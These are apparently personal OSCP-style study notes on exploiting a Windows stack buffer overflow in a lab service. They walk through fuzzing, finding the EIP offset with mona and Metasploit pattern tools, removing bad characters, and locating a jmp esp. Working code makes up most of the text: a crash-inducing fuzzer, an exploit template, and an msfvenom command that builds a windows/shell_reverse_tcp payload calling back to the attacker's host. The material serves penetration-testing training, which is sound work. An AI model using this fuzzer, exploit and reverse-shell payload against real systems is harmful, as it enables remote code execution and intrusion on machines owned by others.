Step 1: Start Immunity Debugger with admin permissions.
Step 2: Attach to or open the target application and put it into the running state (the binary opens in a paused state, so press Run).
How to set the working folder (where mona writes its output) in Immunity Debugger:
!mona config -set workingfolder c:\mona\%p
On the attacking machine (Kali)
Step 1: Do a port scan and identify the target port.
Step 2: nc <ip> <port>
and check the command options the service offers; set the prefix in the fuzzer script accordingly.
Step 3: run the fuzzer and wait for it to report the number of bytes that crashed the program; add 400 to that number to get the pattern length for Step 4.
python fuzzer.py
for example, if the program crashed at 200 bytes, the pattern length is 600.
Step 4: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
Step 5: modify exploit.py, put the pattern in the overflow variable and run the script; observe the EIP value in the debugger.
!mona findmsp -distance 600
(600 is the length of the pattern you created)
this outputs the offset
you can double check it with the following:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 76413176
^^ 76413176 is the value of EIP after the crash with the pattern
Step 6: Confirm the offset
set the offset value in exploit.py so that it sends offset bytes of "A"
followed by the retn / EIP value "BBBB"
observe EIP = 42424242
if so, the offset is correct
Step 7: Find bad chars [the fastest and easiest way]
generate a byte array excluding the null byte
the null byte is always a bad char
!mona bytearray -b "\x00"
use the python script in the appendix to generate the same bad char string on the attacking machine
now send the byte array in the payload section of the python exploit ...
crash the app, then check for bad chars:
after the crash, note the value of ESP [copy this value]
and run this command to check for bad chars
!mona compare -f C:\mona\oscp\bytearray.bin -a <address of esp>
for example, with esp = 0188FA30:
!mona compare -f C:\mona\oscp\bytearray.bin -a 0188FA30
if bad chars show up in a consecutive sequence, keep only the first one (the rest are usually corrupted as a side effect of the first).
rinse and repeat:
update the payload variable and remove the new bad chars from the py exploit
create a new bad char array using the mona module again, excluding everything found so far
!mona bytearray -b "\x00\x23\x3c\x83\xba"
rerun the exploit --> crash the app --> check ESP again and rerun the following
!mona compare -f C:\mona\oscp\bytearray.bin -a <address of esp>
for example, with esp = 0193FA30:
!mona compare -f C:\mona\oscp\bytearray.bin -a 0193FA30
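As an added example (not part of the original notes), here is what "!mona compare" does in Step 7, plus the rinse-and-repeat loop, in plain Python; the vulnerable service is replaced by a constructed function fake_target that mangles four hypothetical bytes, so the script runs offline.

```python
# Added example, not from the original notes: the "!mona compare" check from
# Step 7 and the repeat loop, with a constructed fake_target standing in for the service.

def generate_bytearray(exclude=(0x00,)):
    """Every byte 0x00-0xff except the excluded ones ('!mona bytearray -b ...')."""
    return bytes(b for b in range(256) if b not in set(exclude))

def compare_badchars(sent, observed):
    """Bytes that did not survive the trip into the target's memory.

    A position is bad when the byte read back at ESP differs from the byte sent,
    or is missing because the copy was truncated. Of a run of consecutive bad
    positions only the first is reported (the Step 7 rule): one corrupted byte
    usually damages everything after it, so the later ones are not trusted yet.
    """
    bad, prev_bad = [], False
    for i, expected in enumerate(sent):
        actual = observed[i] if i < len(observed) else None
        differs = actual != expected
        if differs and not prev_bad:
            bad.append(expected)
        prev_bad = differs
    return bad

def mona_style(bad):
    """Format as the \\x.. string used after -b in the notes."""
    return "".join("\\x{:02x}".format(b) for b in bad)

def find_all_badchars(target, exclude=(0x00,), max_rounds=16):
    """Send, compare, exclude, repeat until a round finds nothing new."""
    excluded = set(exclude)
    for _ in range(max_rounds):
        sent = generate_bytearray(excluded)
        new = compare_badchars(sent, target(sent))
        if not new:
            return sorted(excluded)
        excluded.update(new)
    raise RuntimeError("still finding bad chars after {} rounds".format(max_rounds))

# Constructed stand-in for the vulnerable service (hypothetical parser quirk):
# it stores 0x00 in place of 0x0a, 0x23, 0x24 and 0x25.
MANGLED = {0x0a: 0x00, 0x23: 0x00, 0x24: 0x00, 0x25: 0x00}

def fake_target(data):
    return bytes(MANGLED.get(b, b) for b in data)

if __name__ == "__main__":
    first = generate_bytearray()
    print("round 1:", mona_style(compare_badchars(first, fake_target(first))))  # \x0a\x23
    print("all:", mona_style(find_all_badchars(fake_target)))  # \x00\x0a\x23\x24\x25
```

With the constructed target the first round reports only \x0a and \x23; 0x24 and 0x25 are hidden behind 0x23 by the consecutive-run rule and only surface in later rounds, which is exactly why the notes say to rinse and repeat.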
Find jmp esp
after crashing or before crashing [does not matter]; list all your bad chars after the -cpb parameter:
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
^^^^ here go all your bad chars
pick an address of a jmp esp --> save it in reverse (little-endian) byte order in the retn / EIP value in exploit.py
generate your shell code using msfvenom (put all your bad chars after -b)
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00morehere" -f c
paste the output in the payload section like
payload = ("adfadfa"
"adadfa"
"afdawfda"
"awdfawdf")
set the NOP sled somewhere between 12, 16 and 20 bytes
nop = "\x90" * 16
Fuzzer python3 script
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
#!/usr/bin/env python3
import socket, time, sys

ip = "MACHINE_IP"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "  # command the vulnerable service expects, found with nc in Step 2

string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # read the banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)  # if the service crashed, this times out or the connection drops
    except OSError:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
Exploit.py
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
#!/usr/bin/env python3
import socket

ip = "MACHINE_IP"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
# this is your junk (offset bytes, found in Steps 5 and 6)
overflow = "A" * offset
# this is EIP: the jmp esp address, entered in reverse (little-endian) byte order
retn = ""
# this is the NOP sled
padding = ""
# here goes your shellcode in C format (msfvenom -f c output)
payload = ""
# remaining bytes from the total
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except OSError:
    print("Could not connect.")
finally:
    s.close()
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
Appendix: python bad char generator
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
# prints \x01 through \xff as one \x.. string, the same array as "!mona bytearray -b"
# with the null byte excluded, ready to paste into the payload variable
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---